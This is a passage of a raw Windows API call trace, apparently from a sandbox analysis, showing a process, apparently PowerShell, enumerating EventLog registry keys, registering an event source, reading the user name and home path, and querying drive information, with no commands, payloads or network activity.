lpcchClass=0x0, lpcSubKeys=0x2de774*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x2de770*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.139] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x0, lpName=0x3da558, lpcchName=0x2de790, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x2de790, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.139] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x1, lpName=0x3da558, lpcchName=0x2de790, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x2de790, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.139] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x2, lpName=0x3da558, lpcchName=0x2de790, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x2de790, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.139] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x3, lpName=0x3da558, lpcchName=0x2de790, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x2de790, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.139] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x4, lpName=0x3da558, lpcchName=0x2de790, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x2de790, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.140] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x5, lpName=0x3da558, lpcchName=0x2de790, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x2de790, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.140] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x6, lpName=0x3da558, lpcchName=0x2de790, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x2de790, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.140] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x7, lpName=0x3da558, lpcchName=0x2de790, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x2de790, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.140] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x8, lpName=0x3da558, lpcchName=0x2de790, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x2de790, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.140] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de73c | out: phkResult=0x2de73c*=0x36c) returned 0x0 [0146.140] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de73c | out: phkResult=0x2de73c*=0x0) returned 0x2 [0146.140] RegOpenKeyExW (in: hKey=0x320, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de73c | out: phkResult=0x2de73c*=0x370) returned 0x0 [0146.141] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de73c | out: phkResult=0x2de73c*=0x0) returned 0x2 [0146.141] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de73c | out: phkResult=0x2de73c*=0x374) returned 0x0 [0146.141] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de73c | out: phkResult=0x2de73c*=0x0) returned 0x2 [0146.141] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de73c | out: phkResult=0x2de73c*=0x378) returned 0x0 [0146.141] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de73c | out: phkResult=0x2de73c*=0x0) returned 0x2 [0146.141] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de73c | out: phkResult=0x2de73c*=0x37c) returned 0x0 [0146.142] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de73c | out: phkResult=0x2de73c*=0x0) returned 0x2 [0146.142] RegOpenKeyExW (in: hKey=0x320, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de73c | out: phkResult=0x2de73c*=0x380) returned 0x0 [0146.142] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de73c | out: phkResult=0x2de73c*=0x0) returned 0x2 [0146.142] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de73c | out: phkResult=0x2de73c*=0x384) returned 0x0 [0146.142] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de73c | out: phkResult=0x2de73c*=0x0) returned 0x2 [0146.142] RegOpenKeyExW (in: hKey=0x320, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de73c | out: phkResult=0x2de73c*=0x388) returned 0x0 [0146.143] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de73c | out: phkResult=0x2de73c*=0x0) returned 0x2 [0146.143] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de73c | out: phkResult=0x2de73c*=0x38c) returned 0x0 [0146.143] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de73c | out: phkResult=0x2de73c*=0x390) returned 0x0 [0146.143] RegCloseKey (hKey=0x390) returned 0x0 [0146.143] RegCloseKey (hKey=0x320) returned 0x0 [0146.143] RegCloseKey (hKey=0x38c) returned 0x0 [0146.143] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de70c | out: phkResult=0x2de70c*=0x38c) returned 0x0 [0146.144] RegQueryInfoKeyW (in: hKey=0x38c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x2de774, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x2de770, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x2de774*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x2de770*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.144] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x0, lpName=0x3da558, lpcchName=0x2de790, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x2de790, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.144] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x1, lpName=0x3da558, lpcchName=0x2de790, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x2de790, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.144] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x2, lpName=0x3da558, lpcchName=0x2de790, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x2de790, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.144] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x3, lpName=0x3da558, lpcchName=0x2de790, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x2de790, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.144] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x4, lpName=0x3da558, lpcchName=0x2de790, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x2de790, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.145] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x5, lpName=0x3da558, lpcchName=0x2de790, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x2de790, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.145] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x6, lpName=0x3da558, lpcchName=0x2de790, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x2de790, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.145] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x7, lpName=0x3da558, lpcchName=0x2de790, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x2de790, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.145] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x8, lpName=0x3da558, lpcchName=0x2de790, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x2de790, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.145] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de73c | out: phkResult=0x2de73c*=0x320) returned 0x0 [0146.145] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de73c | out: phkResult=0x2de73c*=0x0) returned 0x2 [0146.145] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de73c | out: phkResult=0x2de73c*=0x390) returned 0x0 [0146.146] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de73c | out: phkResult=0x2de73c*=0x0) returned 0x2 [0146.146] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de73c | out: phkResult=0x2de73c*=0x394) returned 0x0 [0146.146] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de73c | out: phkResult=0x2de73c*=0x0) returned 0x2 [0146.146] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de73c | out: phkResult=0x2de73c*=0x398) returned 0x0 [0146.147] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de73c | out: phkResult=0x2de73c*=0x0) returned 0x2 [0146.147] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de73c | out: phkResult=0x2de73c*=0x39c) returned 0x0 [0146.147] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de73c | out: phkResult=0x2de73c*=0x0) returned 0x2 [0146.147] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de73c | out: phkResult=0x2de73c*=0x3a0) returned 0x0 [0146.147] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de73c | out: phkResult=0x2de73c*=0x0) returned 0x2 [0146.147] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de73c | out: phkResult=0x2de73c*=0x3a4) returned 0x0 [0146.147] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de73c | out: phkResult=0x2de73c*=0x0) returned 0x2 [0146.148] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de73c | out: phkResult=0x2de73c*=0x3a8) returned 0x0 [0146.148] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de73c | out: phkResult=0x2de73c*=0x0) returned 0x2 [0146.148] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de73c | out: phkResult=0x2de73c*=0x3ac) returned 0x0 [0146.148] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de73c | out: phkResult=0x2de73c*=0x3b0) returned 0x0 [0146.148] RegCloseKey (hKey=0x3b0) returned 0x0 [0146.149] RegCloseKey (hKey=0x38c) returned 0x0 [0146.149] RegCloseKey (hKey=0x3ac) returned 0x0 [0146.149] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de700 | out: phkResult=0x2de700*=0x3ac) returned 0x0 [0146.149] RegQueryInfoKeyW (in: hKey=0x3ac, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x2de768, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x2de764, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x2de768*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x2de764*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.150] RegEnumKeyExW (in: hKey=0x3ac, dwIndex=0x0, lpName=0x3da558, lpcchName=0x2de784, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x2de784, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.150] RegEnumKeyExW (in: hKey=0x3ac, dwIndex=0x1, lpName=0x3da558, lpcchName=0x2de784, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x2de784, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.150] RegEnumKeyExW (in: hKey=0x3ac, dwIndex=0x2, lpName=0x3da558, lpcchName=0x2de784, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x2de784, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.150] RegEnumKeyExW (in: hKey=0x3ac, dwIndex=0x3, lpName=0x3da558, lpcchName=0x2de784, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x2de784, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.150] RegEnumKeyExW (in: hKey=0x3ac, dwIndex=0x4, lpName=0x3da558, lpcchName=0x2de784, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x2de784, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.151] RegEnumKeyExW (in: hKey=0x3ac, dwIndex=0x5, lpName=0x3da558, lpcchName=0x2de784, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x2de784, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.151] RegEnumKeyExW (in: hKey=0x3ac, dwIndex=0x6, lpName=0x3da558, lpcchName=0x2de784, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x2de784, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.151] RegEnumKeyExW (in: hKey=0x3ac, dwIndex=0x7, lpName=0x3da558, lpcchName=0x2de784, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x2de784, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.151] RegEnumKeyExW (in: hKey=0x3ac, dwIndex=0x8, lpName=0x3da558, lpcchName=0x2de784, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x2de784, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.151] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de730 | out: phkResult=0x2de730*=0x38c) returned 0x0 [0146.152] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de730 | out: phkResult=0x2de730*=0x0) returned 0x2 [0146.152] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de730 | out: phkResult=0x2de730*=0x3b0) returned 0x0 [0146.152] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de730 | out: phkResult=0x2de730*=0x0) returned 0x2 [0146.152] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de730 | out: phkResult=0x2de730*=0x3b4) returned 0x0 [0146.152] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de730 | out: phkResult=0x2de730*=0x0) returned 0x2 [0146.153] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de730 | out: phkResult=0x2de730*=0x3b8) returned 0x0 [0146.153] RegOpenKeyExW (in: hKey=0x3b8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de730 | out: phkResult=0x2de730*=0x0) returned 0x2 [0146.153] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de730 | out: phkResult=0x2de730*=0x3bc) returned 0x0 [0146.153] RegOpenKeyExW (in: hKey=0x3bc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de730 | out: phkResult=0x2de730*=0x0) returned 0x2 [0146.153] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de730 | out: phkResult=0x2de730*=0x3c0) returned 0x0 [0146.153] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de730 | out: phkResult=0x2de730*=0x0) returned 0x2 [0146.154] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de730 | out: phkResult=0x2de730*=0x3c4) returned 0x0 [0146.154] RegOpenKeyExW (in: hKey=0x3c4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de730 | out: phkResult=0x2de730*=0x0) returned 0x2 [0146.154] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de730 | out: phkResult=0x2de730*=0x3c8) returned 0x0 [0146.154] RegOpenKeyExW (in: hKey=0x3c8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de730 | out: phkResult=0x2de730*=0x0) returned 0x2 [0146.154] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de730 | out: phkResult=0x2de730*=0x3cc) returned 0x0 [0146.154] RegOpenKeyExW (in: hKey=0x3cc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de730 | out: phkResult=0x2de730*=0x3d0) returned 0x0 [0146.155] RegCloseKey (hKey=0x3d0) returned 0x0 [0146.155] RegCloseKey (hKey=0x3ac) returned 0x0 [0146.155] RegCloseKey (hKey=0x3cc) returned 0x0 [0146.192] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x2b20004 [0146.196] GetLastError () returned 0x0 [0146.197] ReportEventW (hEventLog=0x2b20004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x34d8a14*="WSMan", lpRawData=0x34d88bc) returned 1 [0146.200] GetLastError () returned 0x0 [0146.201] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0146.201] GetLastError () returned 0xcb [0146.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de2a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.202] GetLastError () returned 0xcb [0146.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de254, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.202] GetLastError () returned 0xcb [0146.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de254, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.202] GetLastError () returned 0xcb [0146.202] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x3d2e10, nSize=0x2de8a4 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x2de8a4) returned 0x1 [0146.202] GetLastError () returned 0xcb [0146.203] GetUserNameW (in: lpBuffer=0x3da558, pcbBuffer=0x2de8ac | out: lpBuffer="aETAdzjz", pcbBuffer=0x2de8ac) returned 1 [0146.203] ReportEventW (hEventLog=0x2b20004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x34dc89c*="Alias", lpRawData=0x34dc758) returned 1 [0146.206] GetLastError () returned 0x0 [0146.207] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0146.207] GetLastError () returned 0xcb [0146.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de2a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.207] GetLastError () returned 0xcb [0146.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de254, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.207] GetLastError () returned 0xcb [0146.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de254, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.207] GetLastError () returned 0xcb [0146.208] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x3d2e10, nSize=0x2de8a4 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x2de8a4) returned 0x1 [0146.208] GetLastError () returned 0xcb [0146.208] GetUserNameW (in: lpBuffer=0x3da558, pcbBuffer=0x2de8ac | out: lpBuffer="aETAdzjz", pcbBuffer=0x2de8ac) returned 1 [0146.209] ReportEventW (hEventLog=0x2b20004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x34e07dc*="Environment", lpRawData=0x34e0698) returned 1 [0146.209] GetLastError () returned 0x0 [0146.210] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0146.210] GetLastError () returned 0xcb [0146.210] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="C:") returned 0x2 [0146.210] GetLastError () returned 0xcb [0146.210] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="\\Users\\aETAdzjz") returned 0xf [0146.211] GetLastError () returned 0xcb [0146.211] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x2de3d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11 [0146.211] GetLastError () returned 0xcb [0146.211] SetErrorMode (uMode=0x1) returned 0x1 [0146.211] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x2de854 | out: lpFileInformation=0x2de854*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0146.211] GetLastError () returned 0xcb [0146.211] SetErrorMode (uMode=0x1) returned 0x1 [0146.230] GetLogicalDrives () returned 0x4 [0146.230] GetLastError () returned 0xcb [0146.254] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2de2f8, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0146.254] GetLastError () returned 0xcb [0146.255] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0146.255] GetLastError () returned 0xcb [0146.255] SetErrorMode (uMode=0x1) returned 0x1 [0146.257] GetVolumeInformationW (in: lpRootPathName="C:\\", 